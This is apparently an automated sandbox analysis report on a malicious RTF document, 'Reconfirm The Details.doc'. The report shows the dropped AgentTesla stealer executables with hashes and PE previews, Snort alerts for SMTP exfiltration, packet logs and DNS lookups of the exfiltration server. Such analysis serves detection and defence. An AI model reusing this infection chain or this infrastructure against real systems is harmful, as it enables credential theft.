                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8016
                                                                                                              Entropy (8bit):3.5818435904178987
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:chQCQMqGqvsqvJCwo0iz8hQCQMqGqvsEHyqvJCwormiztAKrVHxipxpyX3lUVCih:cW7o0iz8WvHnormizt5Pif8XriA2
                                                                                                              MD5:77F3843A1E78AA18EC48DEDA062DAA8C
                                                                                                              SHA1:23318033CE15969125FD192C56E3BE5955F77C74
                                                                                                              SHA-256:DEAFC5ECB755BBE38997255704446A06CDBB6B0BC77EA28C55C9EE8167171482
                                                                                                              SHA-512:E12E25FE49643FAD7D8EB33840D756DBA07B87A7288E2834C774CD3E54B256D5BD2DC2A8F86DEAEFBDAFFF7FF8CBEF7D41623877400279BEEC4A706F95149290
                                                                                                              Malicious:false
                                                                                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\Desktop\~$confirm The Details.doc
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):162
                                                                                                              Entropy (8bit):2.5038355507075254
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                              Malicious:false
                                                                                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:Rich Text Format data, unknown version
                                                                                                              Entropy (8bit):3.60648819236507
                                                                                                              TrID:
                                                                                                              • Rich Text Format (5005/1) 55.56%
                                                                                                              • Rich Text Format (4004/1) 44.44%
                                                                                                              File name:Reconfirm The Details.doc
                                                                                                              File size:393215
                                                                                                              MD5:9a7ea1172bf1250005e0fefce04f604f
                                                                                                              SHA1:3df0782fc6ace41e15ca7c98277c79c128453d10
                                                                                                              SHA256:80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006
                                                                                                              SHA512:e7335ac3fddfaea8211273fb070d071436e880d231c4a9e4d01f44aa7a0b680779b30ca6cd09c19759f2e0c7f6aabb6289fdb9fe02858f1dec063085e318346f
                                                                                                              SSDEEP:1536:iV/f9DDDDDDDtyLy0gvQPmfSoBi59Ujs4Qjw7hKfedzFz76mAg5eeVhMDw5wfLj:iHDDDDDDDIgHLdzFtr5RDAw5wff
                                                                                                              File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                                                                              File Icon

                                                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                                                              Static RTF Info

                                                                                                              Objects

                                                                                                               Id  Start      Format ID  Format    Classname  Datasize  Filename            Sourcepath                      Temppath                        Exploit
                                                                                                               0   000007DAh  2          embedded  package    97620     abdtfhgXgeghDp.ScT  C:\nsdsTggH\abdtfhgXGeghDp.ScT  C:\CbkepaDw\abdtfhghgeghDp.ScT  no
                                                                                                               1   000321F3h  2          embedded  OLE2LInk   2560                                                                                          no

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                               Timestamp                 Protocol  SID      Message                              Source Port  Dest Port  Source IP     Dest IP
                                                                                                               11/25/21-18:15:50.830021  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49167        587        192.168.2.22  208.91.199.224
                                                                                                               11/25/21-18:16:01.234218  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49168        587        192.168.2.22  208.91.199.225
                                                                                                               11/25/21-18:16:13.733229  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49169        587        192.168.2.22  208.91.199.223
                                                                                                               11/25/21-18:16:48.169827  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49172        587        192.168.2.22  208.91.199.224
                                                                                                               11/25/21-18:16:56.612952  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49173        587        192.168.2.22  208.91.199.224
                                                                                                               11/25/21-18:16:57.883879  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49174        587        192.168.2.22  208.91.198.143

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                               Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                                                                               Nov 25, 2021 18:14:53.830594063 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:53.976701021 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:53.976802111 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:53.977502108 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.124871969 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.124969006 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.125030041 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.125087976 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.125258923 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.125307083 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.125312090 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.125314951 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.271748066 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.271838903 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.272073984 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.272281885 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.272366047 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.272474051 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.272543907 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.273787975 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.273843050 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.273931026 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.273947001 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.273987055 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.273993969 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.274039984 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.274130106 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.418554068 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.418601036 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.418621063 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.418642998 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.418859005 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.419271946 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.419298887 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.419332981 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.419348001 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.419373989 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.419418097 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.419424057 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.419465065 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.420228958 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.420283079 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.420347929 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.420398951 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.420553923 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                               Nov 25, 2021 18:14:54.420604944 CET  49165        80         192.168.2.22    173.232.204.89
                                                                                                               Nov 25, 2021 18:14:54.420605898 CET  80           49165      173.232.204.89  192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.420655966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421164989 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421199083 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421217918 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421243906 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421272993 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421317101 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.421327114 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.421365976 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565242052 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565324068 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565355062 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565396070 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565434933 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565474033 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565510035 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565547943 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565603018 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565661907 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565673113 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565677881 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565682888 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565865040 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565903902 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565941095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565962076 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.565979958 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.565994978 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566003084 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566019058 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566049099 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566057920 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566076994 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566097975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566119909 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566137075 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566169977 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566195965 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566200972 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566271067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566291094 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566358089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566409111 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566447973 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566482067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566500902 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566755056 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566790104 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.566828966 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.566854000 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:54.567548990 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567626953 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:54.567666054 CET8049165173.232.204.89192.168.2.22

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 25, 2021 18:15:49.490634918 CET  52167        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:15:49.520104885 CET  53           52167      8.8.8.8       192.168.2.22
Nov 25, 2021 18:15:59.805334091 CET  50591        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:15:59.833695889 CET  53           50591      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:12.298753977 CET  57805        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:12.361740112 CET  53           57805      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:12.362324953 CET  57805        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:12.399799109 CET  53           57805      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:21.448317051 CET  59030        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:21.492975950 CET  53           59030      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:46.932264090 CET  59185        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:46.969466925 CET  53           59185      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:55.348798037 CET  55616        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:55.386456013 CET  53           55616      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:56.537000895 CET  49972        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:56.558192968 CET  53           49972      8.8.8.8       192.168.2.22
Nov 25, 2021 18:16:56.558620930 CET  49972        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:16:56.586457014 CET  53           49972      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                      Type            Class
Nov 25, 2021 18:15:49.490634918 CET  192.168.2.22  8.8.8.8  0x8b24    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:59.805334091 CET  192.168.2.22  8.8.8.8  0x9c20    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.298753977 CET  192.168.2.22  8.8.8.8  0xf1c3    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.362324953 CET  192.168.2.22  8.8.8.8  0xf1c3    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:21.448317051 CET  192.168.2.22  8.8.8.8  0x3d18    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:46.932264090 CET  192.168.2.22  8.8.8.8  0x11d7    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:55.348798037 CET  192.168.2.22  8.8.8.8  0x4b18    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.537000895 CET  192.168.2.22  8.8.8.8  0xb7b1    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.558620930 CET  192.168.2.22  8.8.8.8  0xb7b1    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                      CName  Address         Type            Class
Nov 25, 2021 18:15:49.520104885 CET  8.8.8.8    192.168.2.22  0x8b24    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:49.520104885 CET  8.8.8.8    192.168.2.22  0x8b24    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:49.520104885 CET  8.8.8.8    192.168.2.22  0x8b24    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:49.520104885 CET  8.8.8.8    192.168.2.22  0x8b24    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:59.833695889 CET  8.8.8.8    192.168.2.22  0x9c20    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:59.833695889 CET  8.8.8.8    192.168.2.22  0x9c20    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:59.833695889 CET  8.8.8.8    192.168.2.22  0x9c20    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:15:59.833695889 CET  8.8.8.8    192.168.2.22  0x9c20    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.361740112 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.361740112 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.361740112 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.361740112 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.399799109 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.399799109 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.399799109 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:12.399799109 CET  8.8.8.8    192.168.2.22  0xf1c3    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:21.492975950 CET  8.8.8.8    192.168.2.22  0x3d18    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:21.492975950 CET  8.8.8.8    192.168.2.22  0x3d18    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:21.492975950 CET  8.8.8.8    192.168.2.22  0x3d18    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:21.492975950 CET  8.8.8.8    192.168.2.22  0x3d18    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:46.969466925 CET  8.8.8.8    192.168.2.22  0x11d7    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:46.969466925 CET  8.8.8.8    192.168.2.22  0x11d7    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:46.969466925 CET  8.8.8.8    192.168.2.22  0x11d7    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:46.969466925 CET  8.8.8.8    192.168.2.22  0x11d7    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:55.386456013 CET  8.8.8.8    192.168.2.22  0x4b18    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:55.386456013 CET  8.8.8.8    192.168.2.22  0x4b18    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:55.386456013 CET  8.8.8.8    192.168.2.22  0x4b18    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:55.386456013 CET  8.8.8.8    192.168.2.22  0x4b18    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.558192968 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.558192968 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.558192968 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.558192968 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
